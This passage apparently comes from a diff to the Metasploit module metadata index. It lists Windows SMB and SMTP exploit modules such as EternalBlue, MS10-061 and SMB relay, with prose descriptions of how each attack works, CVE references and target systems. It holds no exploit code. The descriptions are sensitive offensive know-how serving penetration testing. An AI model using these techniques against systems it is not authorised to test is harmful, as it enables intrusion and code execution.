vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.", + "references": [ + "CVE-2010-2568", + "OSVDB-66387", + "MSB-MS10-046", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms10_061_spoolss": { + "name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", + "fullname": "exploit/windows/smb/ms10_061_spoolss", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-09-14", + "type": "exploit", + "author": [ + "jduck ", + "hdm " + ], + "description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.", + "references": [ + "OSVDB-67988", + "CVE-2010-2729", + "MSB-MS10-061" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2025-04-04 11:55:57 +0000", + "path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms10_061_spoolss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms15_020_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-10", + "type": "exploit", + "author": [ + "Michael Heerklotz", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", + "references": [ + "CVE-2015-0096", + "MSB-MS15-020", + "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms17_010_eternalblue": { + "name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", + "fullname": "exploit/windows/smb/ms17_010_eternalblue", + "aliases": [ + "exploit/windows/smb/ms17_010_eternalblue_win8" + ], + "rank": 200, + "disclosure_date": "2017-03-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "sleepya", + "Sean Dillon ", + "Dylan Davis ", + "thelightcosine", + "wvu ", + "agalway-r7", + "cdelafuente-r7", + "cdelafuente-r7", + "agalway-r7" + ], + "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0144", + "CVE-2017-0145", + "CVE-2017-0146", + "CVE-2017-0147", + "CVE-2017-0148", + "URL-https://github.com/RiskSense-Ops/MS17-010", + "URL-https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf", + "EDB-42030" + ], + "platform": "Windows", + "arch": "x64", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Target", + "Windows 7", + "Windows Embedded Standard 7", + "Windows Server 2008 R2", + "Windows 8", + "Windows 8.1", + "Windows Server 2012", + "Windows 10 Pro", + "Windows 10 Enterprise Evaluation" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms17_010_eternalblue", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/ms17_010_psexec": { + "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", + "fullname": "exploit/windows/smb/ms17_010_psexec", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-14", + "type": "exploit", + "author": [ + "sleepya", + "zerosum0x0", + "Shadow Brokers", + "Equation Group" + ], + "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0146", + "CVE-2017-0147", + "URL-https://github.com/worawit/MS17-010", + "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", + "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload" + ], + "mod_time": "2021-06-03 11:43:09 +0000", + "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/ms17_010_psexec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "ETERNALSYNERGY", + "ETERNALROMANCE", + "ETERNALCHAMPION", + "ETERNALBLUE" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/netidentity_xtierrpcpipe": { + "name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow", + "fullname": "exploit/windows/smb/netidentity_xtierrpcpipe", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-04-06", + "type": "exploit", + "author": [ + "MC ", + "Ruben Santamarta" + ], + "description": "This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.", + "references": [ + "CVE-2009-1350", + "OSVDB-53351", + "BID-34400", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows 2000 / Windows XP / Windows 2003" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb", + "is_install_path": true, + "ref_name": "windows/smb/netidentity_xtierrpcpipe", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/psexec": { + "name": "Microsoft Windows Authenticated User Code Execution", + "fullname": "exploit/windows/smb/psexec", + "aliases": [], + "rank": 0, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "hdm ", + "Royce Davis ", + "RageLtMan " + ], + "description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. The service created by this tool uses a randomly\n chosen name and description.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx", + "URL-https://www.optiv.com/blog/owning-computers-without-shell-access", + "URL-http://sourceforge.net/projects/smbexec/" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload", + "Command" + ], + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/exploits/windows/smb/psexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/psexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "smb" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/smb/smb_delivery": { + "name": "SMB Delivery", + "fullname": "exploit/windows/smb/smb_delivery", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-07-26", + "type": "exploit", + "author": [ + "Andrew Smith", + "Russel Van Tuyl" + ], + "description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. Currently supports DLLs and Powershell.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/pull/3074" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DLL", + "PSH" + ], + "mod_time": "2022-05-11 12:40:43 +0000", + "path": "/modules/exploits/windows/smb/smb_delivery.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_doublepulsar_rce": { + "name": "SMB DOUBLEPULSAR Remote Code Execution", + "fullname": "exploit/windows/smb/smb_doublepulsar_rce", + "aliases": [ + "exploit/windows/smb/doublepulsar_rce" + ], + "rank": 500, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "zerosum0x0", + "Luke Jennings", + "wvu ", + "Jacob Robles" + ], + "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", + "references": [ + "MSB-MS17-010", + "CVE-2017-0143", + "CVE-2017-0144", + "CVE-2017-0145", + "CVE-2017-0146", + "CVE-2017-0147", + "CVE-2017-0148", + "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", + "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", + "URL-https://github.com/countercept/doublepulsar-detection-script", + "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1" + ], + "platform": "Windows", + "arch": "x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Execute payload (x64)", + "Neutralize implant" + ], + "mod_time": "2023-09-15 16:40:22 +0000", + "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_doublepulsar_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "DOUBLEPULSAR" + ], + "RelatedModules": [ + "auxiliary/scanner/smb/smb_ms17_010", + "exploit/windows/smb/ms17_010_eternalblue" + ], + "Stability": [ + "crash-os-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_relay": { + "name": "MS08-068 Microsoft Windows SMB Relay Code Execution", + "fullname": "exploit/windows/smb/smb_relay", + "aliases": [], + "rank": 600, + "disclosure_date": "2001-03-31", + "type": "exploit", + "author": [ + "hdm ", + "juan vazquez ", + "agalway-r7", + "alanfoster", + "Spencer McIntyre" + ], + "description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system\tmust try to\tauthenticate\n to this module. The easiest way to force a SMB authentication attempt\n is by embedding a UNC path (\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.\n\n As of Feb 2022 - this module does not support SMB 1.", + "references": [ + "CVE-2008-4037", + "OSVDB-49736", + "MSB-MS08-068", + "URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx", + "URL-https://en.wikipedia.org/wiki/SMBRelay", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "PowerShell", + "Native upload", + "MOF upload", + "Command" + ], + "mod_time": "2024-11-12 09:14:51 +0000", + "path": "/modules/exploits/windows/smb/smb_relay.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_relay", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "account-lockouts" + ] + }, + "session_types": false, + "needs_cleanup": null, + "actions": [ + { + "name": "CREATE_SMB_SESSION", + "description": "Do not close the SMB connection after relaying, and instead create an SMB session" + }, + { + "name": "PSEXEC", + "description": "Use the SMB Connection to run the exploit/windows/psexec module against the relay target" + } + ] + }, + "exploit_windows/smb/smb_rras_erraticgopher": { + "name": "Microsoft Windows RRAS Service MIBEntryGet Overflow", + "fullname": "exploit/windows/smb/smb_rras_erraticgopher", + "aliases": [], + "rank": 200, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Equation Group", + "Shadow Brokers", + "Víctor Portal", + "bcoles " + ], + "description": "This module exploits an overflow in the Windows Routing and Remote\n Access Service (RRAS) to execute code as SYSTEM.\n\n The RRAS DCERPC endpoint is accessible to unauthenticated users via\n SMBv1 browser named pipe on Windows Server 2003 and Windows XP hosts;\n however, this module targets Windows Server 2003 only.\n\n Since the service is hosted inside svchost.exe, a failed exploit\n attempt can cause other system services to fail as well.\n\n The module has been successfully tested on:\n\n Windows Server 2003 SP0 (x86);\n Windows Server 2003 SP1 (x86);\n Windows Server 2003 SP2 (x86); and\n Windows Server 2003 R2 SP2 (x86).", + "references": [ + "CVE-2017-8461", + "CWE-119", + "BID-99012", + "EDB-41929", + "PACKETSTORM-147593", + "URL-https://www.securitytracker.com/id/1038701", + "URL-https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml", + "URL-https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd", + "URL-https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125" + ], + "platform": "Windows", + "arch": "x86", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Windows Server 2003 SP0 (English)", + "Windows Server 2003 SP1 (English) (NX)", + "Windows Server 2003 SP2 (English) (NX)", + "Windows Server 2003 R2 SP2 (English) (NX)" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/smb/smb_rras_erraticgopher.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_rras_erraticgopher", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ErraticGopher" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_shadow": { + "name": "Microsoft Windows SMB Direct Session Takeover", + "fullname": "exploit/windows/smb/smb_shadow", + "aliases": [], + "rank": 0, + "disclosure_date": "2021-02-16", + "type": "exploit", + "author": [ + "usiegl00" + ], + "description": "This module will intercept direct SMB authentication requests to\n another host, gaining access to an authenticated SMB session if\n successful. If the connecting user is an administrator and network\n logins are allowed to the target machine, this module will execute an\n arbitrary payload. To exploit this, the target system must try to\n autheticate to another host on the local area network.\n\n SMB Direct Session takeover is a combination of previous attacks.\n\n This module is dependent on an external ARP spoofer. The builtin ARP\n spoofer was not providing sufficient host discovery. Bettercap v1.6.2\n was used during the development of this module.\n\n The original SMB relay attack was first reported by Sir Dystic on March\n 31st, 2001 at @lanta.con in Atlanta, Georgia.", + "references": [ + "URL-https://strontium.io/blog/introducing-windows-10-smb-shadow-attack" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-04-06 07:12:46 +0000", + "path": "/modules/exploits/windows/smb/smb_shadow.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_shadow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/timbuktu_plughntcommand_bof": { + "name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow", + "fullname": "exploit/windows/smb/timbuktu_plughntcommand_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-06-25", + "type": "exploit", + "author": [ + "bannedit " + ], + "description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.", + "references": [ + "CVE-2009-1394", + "OSVDB-55436", + "BID-35496", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb", + "is_install_path": true, + "ref_name": "windows/smb/timbuktu_plughntcommand_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/webexec": { + "name": "WebExec Authenticated User Code Execution", + "fullname": "exploit/windows/smb/webexec", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-24", + "type": "exploit", + "author": [ + "Ron " + ], + "description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Native upload" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/webexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/webexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/mailcarrier_smtp_ehlo": { + "name": "TABS MailCarrier v2.51 SMTP EHLO Overflow", + "fullname": "exploit/windows/smtp/mailcarrier_smtp_ehlo", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-10-26", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.", + "references": [ + "CVE-2004-1638", + "OSVDB-11174", + "BID-11535", + "EDB-598" + ], + "platform": "Windows", + "arch": "x86", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0 - XP SP1 - EN/FR/GR", + "Windows XP SP2 - EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb", + "is_install_path": true, + "ref_name": "windows/smtp/mailcarrier_smtp_ehlo", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/mercury_cram_md5": { + "name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", + "fullname": "exploit/windows/smtp/mercury_cram_md5", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.", + "references": [ + "CVE-2007-4440", + "OSVDB-39669", + "BID-25357" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Mercury Mail Transport System 4.51" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb", + "is_install_path": true, + "ref_name": "windows/smtp/mercury_cram_md5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/ms03_046_exchange2000_xexch50": { + "name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow", + "fullname": "exploit/windows/smtp/ms03_046_exchange2000_xexch50", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-10-15", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. This exploit is *very* unreliable.", + "references": [ + "CVE-2003-0714", + "BID-8838", + "OSVDB-2674", + "MSB-MS03-046", + "EDB-113" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Exchange 2000" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb", + "is_install_path": true, + "ref_name": "windows/smtp/ms03_046_exchange2000_xexch50", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/njstar_smtp_bof": { + "name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", + "fullname": "exploit/windows/smtp/njstar_smtp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-31", + "type": "exploit", + "author": [ + "Dillon Beresford" + ], + "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.", + "references": [ + "OSVDB-76728", + "CVE-2011-4040", + "URL-http://www.njstar.com/cms/njstar-communicator", + "EDB-18057" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3", + "Windows Server 2003 SP0", + "Windows Server 2003 SP1/SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb", + "is_install_path": true, + "ref_name": "windows/smtp/njstar_smtp_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/sysgauge_client_bof": { + "name": "SysGauge SMTP Validation Buffer Overflow", + "fullname": "exploit/windows/smtp/sysgauge_client_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-02-28", + "type": "exploit", + "author": [ + "Chris Higgins", + "Peter Baris" + ], + "description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.", + "references": [ + "CVE-2017-6416", + "EDB-41479" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2018-07-12 17:34:52 +0000", + "path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb", + "is_install_path": true, + "ref_name": "windows/smtp/sysgauge_client_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/wmailserver": { + "name": "SoftiaCom WMailserver 1.0 Buffer Overflow", + "fullname": "exploit/windows/smtp/wmailserver", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-07-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.", + "references": [ + "CVE-2005-2287", + "OSVDB-17883", + "BID-14213" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/wmailserver.rb", + "is_install_path": true, + "ref_name": "windows/smtp/wmailserver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/ypops_overflow1": { + "name": "YPOPS 0.6 Buffer Overflow", + "fullname": 